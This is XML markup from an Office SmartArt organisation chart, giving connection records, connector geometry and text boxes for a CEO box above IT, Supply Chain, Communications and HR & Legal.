    <dgm:cxn modelId="{DC0FCF20-863B-49BF-94C3-1C5AE9F0D7E3}" type="presOf" srcId="{9A891054-20BC-49D1-922C-FA0E4E35F15D}" destId="{FB05A44B-7613-4344-A8B7-936187EF3383}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{9817643C-0FE8-4486-98D6-EB1D03D3EADE}" type="presOf" srcId="{0ACEE1F4-DA08-45AD-A87C-80FE6BB051F2}" destId="{2574A879-19EB-4065-B1DC-693641994E36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{8679F23D-2651-4E44-B96A-A7B9E3691592}" type="presOf" srcId="{C83B6D39-9215-4969-A840-A6B16995E20F}" destId="{6D0325BF-3F84-4212-91F7-292B4DD5FF5F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0AAAE53F-DE21-4990-BFCF-597BED80CA30}" type="presOf" srcId="{E9C39BFB-FBA1-4AE8-9AA6-EEF469E5739C}" destId="{06047333-B71D-4B26-9298-263FDE70B20F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{8071ED65-5D4D-4F37-996D-0E53BDBF4BC7}" type="presOf" srcId="{9AB27BA7-9627-4599-8E2A-D5AE6F48AD2E}" destId="{8F689D2B-47B6-4292-8359-008599566C40}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{14BD7A48-11D8-4794-B5D4-B51593554441}" type="presOf" srcId="{0ACEE1F4-DA08-45AD-A87C-80FE6BB051F2}" destId="{89323A65-1707-434E-86A1-1851FE91B804}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{B7D69A6B-E063-49EC-8441-C458ED85CFE2}" type="presOf" srcId="{7273B987-4607-40AB-A053-4F973BF1C674}" destId="{FC2C8FD9-95EB-4FAA-ABC7-34B32AA44905}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D1437F51-AED5-4E67-B94C-A629FEE030B5}" srcId="{C83B6D39-9215-4969-A840-A6B16995E20F}" destId="{0ACEE1F4-DA08-45AD-A87C-80FE6BB051F2}" srcOrd="0" destOrd="0" parTransId="{6F3E4730-E81A-4CE7-8F7B-602CF6A2F675}" sibTransId="{09331608-B098-494A-BAA1-C9DA9802E1F2}"/>
    <dgm:cxn modelId="{19F00756-2320-4921-AE5E-D5E0890F5FEC}" type="presOf" srcId="{2E6FCAA9-B408-4DFF-B6D2-6957DD50087C}" destId="{B297F67E-E9D5-4E87-8661-4608A76330D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{7964367B-B04D-4D93-B0FA-61C812B4AAF3}" type="presOf" srcId="{DE10B2EE-FA7A-4B95-A29F-2F15F2A92663}" destId="{305CEF3F-1F72-4C3A-B2F9-842099BA7155}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{14DC388F-2B78-4F06-86E7-50FA926A3787}" srcId="{C83B6D39-9215-4969-A840-A6B16995E20F}" destId="{9AB27BA7-9627-4599-8E2A-D5AE6F48AD2E}" srcOrd="3" destOrd="0" parTransId="{3A644446-8CF8-4CF9-B1B3-083AE29BA447}" sibTransId="{C718CA00-DCC5-4725-8691-262378C300C8}"/>
    <dgm:cxn modelId="{17391C95-24C3-4B20-B78D-F8A408F13CA5}" srcId="{C83B6D39-9215-4969-A840-A6B16995E20F}" destId="{9A891054-20BC-49D1-922C-FA0E4E35F15D}" srcOrd="2" destOrd="0" parTransId="{E9C39BFB-FBA1-4AE8-9AA6-EEF469E5739C}" sibTransId="{A08ECDB5-D89C-4966-A21D-D07F2B675E38}"/>
    <dgm:cxn modelId="{41714596-960E-46BB-B46C-47DF0DEE9EF4}" type="presOf" srcId="{6F3E4730-E81A-4CE7-8F7B-602CF6A2F675}" destId="{F177FE32-E817-4C4D-8D30-F6F7E0A7ED57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{EE43FAA0-79FE-4A90-8532-A95CED552B6B}" type="presOf" srcId="{3A644446-8CF8-4CF9-B1B3-083AE29BA447}" destId="{9373ABE2-0139-49D6-A850-FAE93C8531EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{633E55B2-0D85-4C2A-A644-38986BB25DED}" type="presOf" srcId="{C83B6D39-9215-4969-A840-A6B16995E20F}" destId="{52C93FAD-53BC-49A3-8030-10EC72D7F46E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{1EA598D6-CEF5-4A54-8C55-3CB6A3364899}" type="presOf" srcId="{2E6FCAA9-B408-4DFF-B6D2-6957DD50087C}" destId="{D12FFA0D-0A72-4752-8554-6AC5832632C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A7D372DB-B208-46EC-829F-27870D6A60C4}" type="presOf" srcId="{90DD9CCA-0006-4454-9AEE-4B3A14424674}" destId="{40B2A202-B083-4987-B166-5EE401EE9D81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6F1E36DE-E1E2-43C2-BA44-9D28CB407C97}" type="presOf" srcId="{9AB27BA7-9627-4599-8E2A-D5AE6F48AD2E}" destId="{483FE78F-90CA-471C-B456-30B3A3DCF8E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6317D4E0-F70E-4433-AA65-E7FF9144AD88}" type="presOf" srcId="{DE10B2EE-FA7A-4B95-A29F-2F15F2A92663}" destId="{00C7ACDA-CAC1-4A1D-B976-B6817DFF7AFC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{895236E2-9BE2-4F44-B778-BD53D1A146DA}" srcId="{C83B6D39-9215-4969-A840-A6B16995E20F}" destId="{DE10B2EE-FA7A-4B95-A29F-2F15F2A92663}" srcOrd="1" destOrd="0" parTransId="{90DD9CCA-0006-4454-9AEE-4B3A14424674}" sibTransId="{B5DB05CA-E5B0-4C3B-A403-96D2F8CFB068}"/>
    <dgm:cxn modelId="{77A3FAE4-97B0-4E1B-ACA8-5C39D176C18D}" type="presOf" srcId="{024DEC98-1DD4-4392-A76F-ABFCFBFC3770}" destId="{62385AC9-E587-49F0-919F-64B61B83F8A0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0B80ACFA-8A9E-4E82-9CA0-F1BCBCEB0ADD}" type="presOf" srcId="{9A891054-20BC-49D1-922C-FA0E4E35F15D}" destId="{AEB46920-ABB0-46FD-9820-3BBDEC7A7BDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E64C8433-7567-4578-BE78-4643303BEAAB}" type="presParOf" srcId="{62385AC9-E587-49F0-919F-64B61B83F8A0}" destId="{C09A3270-A16B-4BFF-BD28-DEDD1050AC81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{20C9FF87-19AA-4013-B500-DB63D10C2623}" type="presParOf" srcId="{C09A3270-A16B-4BFF-BD28-DEDD1050AC81}" destId="{BFA8458F-DB14-460A-BD9D-97C0B91DD11F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{F79D0ACC-E44C-4C3D-AACE-C5E501A18476}" type="presParOf" srcId="{BFA8458F-DB14-460A-BD9D-97C0B91DD11F}" destId="{52C93FAD-53BC-49A3-8030-10EC72D7F46E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6EE648F4-1B22-44ED-8D1A-C6D03C860255}" type="presParOf" srcId="{BFA8458F-DB14-460A-BD9D-97C0B91DD11F}" destId="{6D0325BF-3F84-4212-91F7-292B4DD5FF5F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{05C41108-AD01-4904-BC79-EA6BE206121D}" type="presParOf" srcId="{C09A3270-A16B-4BFF-BD28-DEDD1050AC81}" destId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{C5AAD560-93BF-4F57-AAE7-BF08E38AEC6A}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{F177FE32-E817-4C4D-8D30-F6F7E0A7ED57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{50AECC39-C974-4FAC-8D23-6C187AF069DB}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{D7E805C9-77B0-4C77-B4C9-86DF3017FDD3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{49209144-6EAE-4BDD-9BA7-75C2E9782001}" type="presParOf" srcId="{D7E805C9-77B0-4C77-B4C9-86DF3017FDD3}" destId="{770BA6B5-6658-41F2-8F54-70DC59D2D512}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{1FFD9A26-8B3A-4777-BB80-C99EE9BF7B13}" type="presParOf" srcId="{770BA6B5-6658-41F2-8F54-70DC59D2D512}" destId="{2574A879-19EB-4065-B1DC-693641994E36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DBC3C971-AB6E-4668-954D-723D150A832A}" type="presParOf" srcId="{770BA6B5-6658-41F2-8F54-70DC59D2D512}" destId="{89323A65-1707-434E-86A1-1851FE91B804}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{CB62CA8D-580D-41BA-B0CD-811F893B9409}" type="presParOf" srcId="{D7E805C9-77B0-4C77-B4C9-86DF3017FDD3}" destId="{363EA721-406A-4657-A8A8-4D43204B5188}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{607EC5CD-50B3-44DF-AEFE-E0B759FE9CD1}" type="presParOf" srcId="{D7E805C9-77B0-4C77-B4C9-86DF3017FDD3}" destId="{B32A1B16-EA3E-43AD-A173-665AB4414B25}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{80763124-C156-4EB2-BBE5-C175D7F7264E}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{40B2A202-B083-4987-B166-5EE401EE9D81}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4380C5C8-72B9-42BD-B951-495601E73C5C}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{403A0D8C-C22D-4A60-98AA-208FD607C5D0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{8BCC2C39-2CCE-4F10-8653-3F24E6FD25EF}" type="presParOf" srcId="{403A0D8C-C22D-4A60-98AA-208FD607C5D0}" destId="{D835311B-111D-4058-B527-BEDE05F8365C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{08A0404F-0153-4B19-92B0-DB1B5C19B837}" type="presParOf" srcId="{D835311B-111D-4058-B527-BEDE05F8365C}" destId="{00C7ACDA-CAC1-4A1D-B976-B6817DFF7AFC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{90A977E4-1ED9-400F-B65E-FA599580B585}" type="presParOf" srcId="{D835311B-111D-4058-B527-BEDE05F8365C}" destId="{305CEF3F-1F72-4C3A-B2F9-842099BA7155}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{B9AFD16A-E585-4327-BC1E-85008A4365A3}" type="presParOf" srcId="{403A0D8C-C22D-4A60-98AA-208FD607C5D0}" destId="{20599753-12E4-44B2-8B7F-39F4B07B9026}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6A06B5FB-1FAF-40FB-896C-CEA8C1798BF0}" type="presParOf" srcId="{403A0D8C-C22D-4A60-98AA-208FD607C5D0}" destId="{BAE96CAB-C821-425F-B492-D86FB1715A62}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{4F1508D4-BBAA-415A-BA7F-49D142E46EDA}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{06047333-B71D-4B26-9298-263FDE70B20F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6563C7E3-B61F-4C45-96BE-8FFFCAED70D6}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{32825100-E59B-490E-ABB1-390F72704F6D}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{A75FD837-D141-4004-96DC-02D9282CABB4}" type="presParOf" srcId="{32825100-E59B-490E-ABB1-390F72704F6D}" destId="{E106FCD0-44A8-4846-BE39-362475D08EA7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{DAABE09A-3871-445E-96E9-BF6D7FC98495}" type="presParOf" srcId="{E106FCD0-44A8-4846-BE39-362475D08EA7}" destId="{FB05A44B-7613-4344-A8B7-936187EF3383}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D7C935B4-4A73-4D10-A0B3-A1673E4E1AE8}" type="presParOf" srcId="{E106FCD0-44A8-4846-BE39-362475D08EA7}" destId="{AEB46920-ABB0-46FD-9820-3BBDEC7A7BDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{D26E596E-07CB-4E94-A2BA-FADA2B0956D0}" type="presParOf" srcId="{32825100-E59B-490E-ABB1-390F72704F6D}" destId="{3D83CFD1-EC72-4369-9966-79A5A72E717A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{E5068253-E3ED-4D04-930B-0CDB392BA95B}" type="presParOf" srcId="{32825100-E59B-490E-ABB1-390F72704F6D}" destId="{169A74E4-C934-4A91-86DB-424636416A60}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{6E2C028B-05F2-42D4-8079-CDA45B061934}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{9373ABE2-0139-49D6-A850-FAE93C8531EE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{FACBF2D3-7B31-444E-8010-2E3E1868D80E}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{987323AD-C94C-4FF1-B3BB-E4DAD7D8997A}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{64ECFBC8-DAC5-4FDA-8B9F-3344058BCCC8}" type="presParOf" srcId="{987323AD-C94C-4FF1-B3BB-E4DAD7D8997A}" destId="{341A5D20-1DCF-44CA-A79D-4A69DF8E495A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{F9F23504-0285-47DB-8CC7-661EFF2381B6}" type="presParOf" srcId="{341A5D20-1DCF-44CA-A79D-4A69DF8E495A}" destId="{8F689D2B-47B6-4292-8359-008599566C40}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{0A2A1711-B023-4269-8728-933FA4B5E851}" type="presParOf" srcId="{341A5D20-1DCF-44CA-A79D-4A69DF8E495A}" destId="{483FE78F-90CA-471C-B456-30B3A3DCF8E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{27FE7810-4E78-4FAF-BF57-2E36E181E21A}" type="presParOf" srcId="{987323AD-C94C-4FF1-B3BB-E4DAD7D8997A}" destId="{4F87FCFA-A561-490A-8A70-A310DCECDB08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{BDBC914F-9E4F-48F1-B96D-875D57E79D2E}" type="presParOf" srcId="{987323AD-C94C-4FF1-B3BB-E4DAD7D8997A}" destId="{6A8AFB59-848E-4B5A-A460-7C1FE280B6C1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{F5AD971F-8570-491D-A459-E34F798E6999}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{FC2C8FD9-95EB-4FAA-ABC7-34B32AA44905}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{3AD1FD50-9AA4-4962-B251-F592AF7666B7}" type="presParOf" srcId="{EE9F3A85-537D-4B2C-9709-DA3F708E07F2}" destId="{90099BFE-1413-4D51-A98C-BA3F71236F90}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{705CCD69-1167-4FD4-B50A-90D79F853FD8}" type="presParOf" srcId="{90099BFE-1413-4D51-A98C-BA3F71236F90}" destId="{0F633DE7-924C-4AD5-B5B5-1A792FEAD4D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{EF7BA886-A2D2-47F1-9F02-C53094926DC0}" type="presParOf" srcId="{0F633DE7-924C-4AD5-B5B5-1A792FEAD4D1}" destId="{B297F67E-E9D5-4E87-8661-4608A76330D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{23BFA9E2-A4B1-451B-8450-C7B4B200D5FB}" type="presParOf" srcId="{0F633DE7-924C-4AD5-B5B5-1A792FEAD4D1}" destId="{D12FFA0D-0A72-4752-8554-6AC5832632C2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{FCBC0DEA-1C11-4861-80B6-F374F1321964}" type="presParOf" srcId="{90099BFE-1413-4D51-A98C-BA3F71236F90}" destId="{8CE6049E-999D-4B7B-9C7B-CEC38D3B4B31}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{2C595DA7-6412-47EC-9634-AB6A142C09C3}" type="presParOf" srcId="{90099BFE-1413-4D51-A98C-BA3F71236F90}" destId="{19528084-4066-4BDB-98DB-57E00590F638}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1"/>
    <dgm:cxn modelId="{3625BC80-CB54-4AF8-AF4C-9E3FDD5A1A94}" type="presParOf" srcId="{C09A3270-A16B-4BFF-BD28-DEDD1050AC81}" destId="{E04106E5-B409-4706-84E4-2D0D4FCE0AA1}"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2C8FD9-95EB-4FAA-ABC7-34B32AA44905}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2281237" y="1184808"/>
          <a:ext cx="1890291" cy="164033"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1890291" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1890291" y="16403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9373ABE2-0139-49D6-A850-FAE93C8531EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2281237" y="1184808"/>
          <a:ext cx="945145" cy="164033"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="945145" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="945145" y="16403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6047333-B71D-4B26-9298-263FDE70B20F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2235517" y="1184808"/>
          <a:ext cx="91440" cy="164033"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="16403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40B2A202-B083-4987-B166-5EE401EE9D81}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1336091" y="1184808"/>
          <a:ext cx="945145" cy="164033"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="945145" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="945145" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="16403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177FE32-E817-4C4D-8D30-F6F7E0A7ED57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="390945" y="1184808"/>
          <a:ext cx="1890291" cy="164033"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1890291" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1890291" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="82016"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="164033"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="5B9BD5">
              <a:shade val="60000"/>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52C93FAD-53BC-49A3-8030-10EC72D7F46E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1890681" y="794252"/>
          <a:ext cx="781112" cy="39055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i-FI" sz="700" kern="1200">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>CEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1890681" y="794252"/>
        <a:ext cx="781112" cy="390556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2574A879-19EB-4065-B1DC-693641994E36}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="389" y="1348841"/>
          <a:ext cx="781112" cy="39055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i-FI" sz="700" kern="1200">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>IT</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="389" y="1348841"/>
        <a:ext cx="781112" cy="390556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00C7ACDA-CAC1-4A1D-B976-B6817DFF7AFC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="945535" y="1348841"/>
          <a:ext cx="781112" cy="39055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i-FI" sz="700" kern="1200">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Supply Chain</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="945535" y="1348841"/>
        <a:ext cx="781112" cy="390556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FB05A44B-7613-4344-A8B7-936187EF3383}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1890681" y="1348841"/>
          <a:ext cx="781112" cy="39055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i-FI" sz="700" kern="1200">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Communications</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1890681" y="1348841"/>
        <a:ext cx="781112" cy="390556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8F689D2B-47B6-4292-8359-008599566C40}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2835827" y="1348841"/>
          <a:ext cx="781112" cy="39055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i-FI" sz="700" kern="1200">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>HR &amp; Legal</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2835827" y="1348841"/>
        <a:ext cx="781112" cy="390556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B297F67E-E9D5-4E87-8661-4608A76330D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3780972" y="1348841"/>
          <a:ext cx="781112" cy="390556"/>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fi-FI" sz="700" kern="1200">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF"/>
